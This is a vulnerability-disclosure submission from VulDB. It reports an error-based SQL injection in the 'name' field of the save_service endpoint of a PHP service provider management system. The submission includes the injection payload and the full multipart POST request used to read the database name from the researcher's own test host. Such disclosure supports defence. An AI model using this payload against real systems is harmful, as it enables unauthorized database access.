Submit #149466: Service Provider Management System SQL Injectioninfo

TitelService Provider Management System SQL Injection
BeschreibungService Provider Management System is a content mangement system implemented by PHP and MySQL. The system exists an error-based SQL Injection vulnerability.For security reason,I just tested read the database name by attack vector 1111'and/**/extractvalue(1,concat(char(126),(select database())))and' with the relative URL **/classes/Master.php?f=save_service** by POST method. The full request packet as shown below: POST /classes/Master.php?f=save_service HTTP/1.1 Host: test1.io Content-Length: 645 Accept: application/json, text/javascript, */*; q=0.01 X-Requested-With: XMLHttpRequest User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/x.x.x.x Safari/537.36 Content-Type: multipart/form-data; boundary=----WebKitFormBoundary6MLktzFeN9gO8Lzp Origin: http://test1.io Referer: http://test1.io/admin/?page=services/manage_service Accept-Encoding: gzip, deflate Accept-Language: en,zh-CN;q=0.9,zh;q=0.8 Connection: close ------WebKitFormBoundary6MLktzFeN9gO8Lzp Content-Disposition: form-data; name="id" ------WebKitFormBoundary6MLktzFeN9gO8Lzp Content-Disposition: form-data; name="name" 1111'and/**/extractvalue(1,concat(char(126),(select database())))and' ------WebKitFormBoundary6MLktzFeN9gO8Lzp Content-Disposition: form-data; name="description" <p>123456</p> ------WebKitFormBoundary6MLktzFeN9gO8Lzp Content-Disposition: form-data; name="image"; filename="" Content-Type: application/octet-stream ------WebKitFormBoundary6MLktzFeN9gO8Lzp Content-Disposition: form-data; name="status" 1 ------WebKitFormBoundary6MLktzFeN9gO8Lzp-- Where test1.io is my own test environment website. The response contains the execution value of database() function in MySql ,which cause SQL injection vulnerability. http://cdn.polowong.top/image-20230427193041378.png For validation,I checked the database name from my own environment: http://cdn.polowong.top/image-20230427193216985.png The result is same as SQL injection vulnerability exploited.
Quelle⚠️ https://www.sourcecodester.com/download-code?nid=16501&title=Service+Provider+Management+System+using+PHP+and+MySQL+Source+Code+Free+Download
Benutzer
 polowong (UID 45828)
Einreichung27.04.2023 13:34 (vor 3 Jahren)
Moderieren27.04.2023 15:38 (2 hours later)
StatusAkzeptiert
VulDB Eintrag227587 [SourceCodester Service Provider Management System 1.0 HTTP POST Request Master.php?f=save_service Name SQL Injection]
Punkte17

ZurückÜbersichtWeiter

Do you need the next level of professionalism?

Upgrade your account now!